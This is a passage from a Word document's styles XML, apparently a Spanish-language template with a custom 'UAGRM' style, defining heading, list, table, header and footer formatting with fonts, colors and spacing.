    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00ED68D7"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="80" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="265F65" w:themeColor="accent2" w:themeShade="80"/>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D68D7"/>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7E33FE"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="58B6C0" w:themeColor="accent2"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo3Car">
    <w:name w:val="Título 3 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="007E33FE"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="398E98" w:themeColor="accent2" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo4Car">
    <w:name w:val="Título 4 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D11E70"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="265F65" w:themeColor="accent2" w:themeShade="80"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="28"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo5Car">
    <w:name w:val="Título 5 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00ED68D7"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="398E98" w:themeColor="accent2" w:themeShade="BF"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo6Car">
    <w:name w:val="Título 6 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo6"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00ED68D7"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="265F65" w:themeColor="accent2" w:themeShade="80"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo7Car">
    <w:name w:val="Título 7 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00ED68D7"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="265F65" w:themeColor="accent2" w:themeShade="80"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo8Car">
    <w:name w:val="Título 8 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00ED68D7"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="265F65" w:themeColor="accent2" w:themeShade="80"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo9Car">
    <w:name w:val="Título 9 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00ED68D7"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="265F65" w:themeColor="accent2" w:themeShade="80"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Prrafodelista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C87897"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Descripcin">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00ED68D7"/>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ED68D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ED68D7"/>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ED68D7"/>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ED68D7"/>
    <w:rPr>
      <w:caps/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:spacing w:val="20"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Textoennegrita">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00ED68D7"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="nfasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00ED68D7"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sinespaciado">
    <w:name w:val="No Spacing"/>
    <w:link w:val="SinespaciadoCar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00ED68D7"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SinespaciadoCar">
    <w:name w:val="Sin espaciado Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Sinespaciado"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="007C1EFC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Cita">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="CitaCar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="00ED68D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ED68D7"/>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ED68D7"/>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ED68D7"/>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ED68D7"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="nfasisintenso">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00ED68D7"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:caps w:val="0"/>
      <w:smallCaps w:val="0"/>
      <w:strike w:val="0"/>
      <w:dstrike w:val="0"/>
      <w:color w:val="58B6C0" w:themeColor="accent2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Referenciasutil">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:rsid w:val="00ED68D7"/>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ED68D7"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps w:val="0"/>
      <w:smallCaps/>
      <w:color w:val="auto"/>
      <w:spacing w:val="0"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Ttulodellibro">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:rsid w:val="00ED68D7"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps w:val="0"/>
      <w:smallCaps/>
      <w:spacing w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TtuloTDC">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Ttulo1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00ED68D7"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B54968"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B54968"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="210"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculo">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B54968"/>
    <w:rPr>
      <w:color w:val="6B9F25" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D87D93"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="005A7CE5"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Saludo">
    <w:name w:val="Salutation"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SaludoCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005A7CE5"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SaludoCar">
    <w:name w:val="Saludo Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Saludo"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="005A7CE5"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textoindependiente">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextoindependienteCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005A7CE5"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TextoindependienteCar">
    <w:name w:val="Texto independiente Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Textoindependiente"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="005A7CE5"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="UAGRM">
    <w:name w:val="UAGRM"/>
    <w:basedOn w:val="Sinespaciado"/>
    <w:link w:val="UAGRMCar"/>
    <w:qFormat/>
    <w:rsid w:val="007C1EFC"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="FF0000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:u w:color="000000" w:themeColor="text1"/>
      <w:lang w:val="es-ES_tradnl"/>
      <w14:textFill>
        <w14:gradFill>
          <w14:gsLst>
            <w14:gs w14:pos="0">
              <w14:srgbClr w14:val="FF0000"/>
            </w14:gs>
            <w14:gs w14:pos="86000">
              <w14:schemeClr w14:val="accent5">
                <w14:lumMod w14:val="50000"/>
              </w14:schemeClr>
            </w14:gs>
          </w14:gsLst>
          <w14:lin w14:ang="5400000" w14:scaled="0"/>
        </w14:gradFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UAGRMCar">
    <w:name w:val="UAGRM Car"/>
    <w:basedOn w:val="SinespaciadoCar"/>
    <w:link w:val="UAGRM"/>
    <w:rsid w:val="007C1EFC"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="FF0000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:u w:color="000000" w:themeColor="text1"/>
      <w:lang w:val="es-ES_tradnl"/>
      <w14:textFill>
        <w14:gradFill>
          <w14:gsLst>
            <w14:gs w14:pos="0">
              <w14:srgbClr w14:val="FF0000"/>
            </w14:gs>
            <w14:gs w14:pos="86000">
              <w14:schemeClr w14:val="accent5">
                <w14:lumMod w14:val="50000"/>
              </w14:schemeClr>
            </w14:gs>
          </w14:gsLst>
          <w14:lin w14:ang="5400000" w14:scaled="0"/>
        </w14:gradFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Encabezado">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="EncabezadoCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007C1EFC"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4419"/>
        <w:tab w:val="right" w:pos="8838"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EncabezadoCar">
    <w:name w:val="Encabezado Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Encabezado"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="007C1EFC"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PiedepginaCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007C1EFC"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4419"/>
        <w:tab w:val="right" w:pos="8838"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PiedepginaCar">
    <w:name w:val="Pie de página Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Piedepgina"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="007C1EFC"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TextodegloboCar">
    <w:name w:val="Texto de globo Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Textodeglobo"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="007C1EFC"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textodeglobo">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextodegloboCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007C1EFC"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="007C1EFC"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:u w:color="000000" w:themeColor="text1"/>
      <w:lang w:val="es-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Normal2">
    <w:name w:val="Normal2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Normal2Car"/>
    <w:qFormat/>
    <w:rsid w:val="007C1EFC"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:ind w:left="340"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Normal2Car">
    <w:name w:val="Normal2 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Normal2"/>
    <w:rsid w:val="007C1EFC"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Tabladelista3-nfasis51">
    <w:name w:val="Tabla de lista 3 - Énfasis 51"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="48"/>
    <w:rsid w:val="007C1EFC"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="84ACB6" w:themeColor="accent5"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="84ACB6" w:themeColor="accent5"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="84ACB6" w:themeColor="accent5"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="84ACB6" w:themeColor="accent5"/>
      </w:tblBorders>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="84ACB6" w:themeFill="accent5"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:sz="4" w:space="0" w:color="84ACB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4ACB6" w:themeColor="accent5"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="84ACB6" w:themeColor="accent5"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="84ACB6" w:themeColor="accent5"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="84AC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4ACB6" w:themeColor="accent5"/>
          <w:left w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="swCell">
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:sz="4" w:space="0" w:color="84ACB6" w:themeColor="accent5"/>
          <w:right w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Titulo4">
    <w:name w:val="Titulo 4"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Titulo4Car"/>
    <w:qFormat/>
    <w:rsid w:val="007C1EFC"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titulo4Car">
    <w:name w:val="Titulo 4 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Titulo4"/>
    <w:rsid w:val="007C1EFC"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Lista">
    <w:name w:val="List"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007C1EFC"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:ind w:left="283" w:hanging="283"/>
      <w:contextualSpacing/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Lista2">
    <w:name w:val="List 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007C1EFC"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:ind w:left="566" w:hanging="283"/>
      <w:contextualSpacing/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Lista3">
    <w:name w:val="List 3"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007C1EFC"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:ind w:left="849" w:hanging="283"/>
      <w:contextualSpacing/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:u w:color="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Listaconvietas">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007C1EFC"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="24"/>
      </w:numPr>
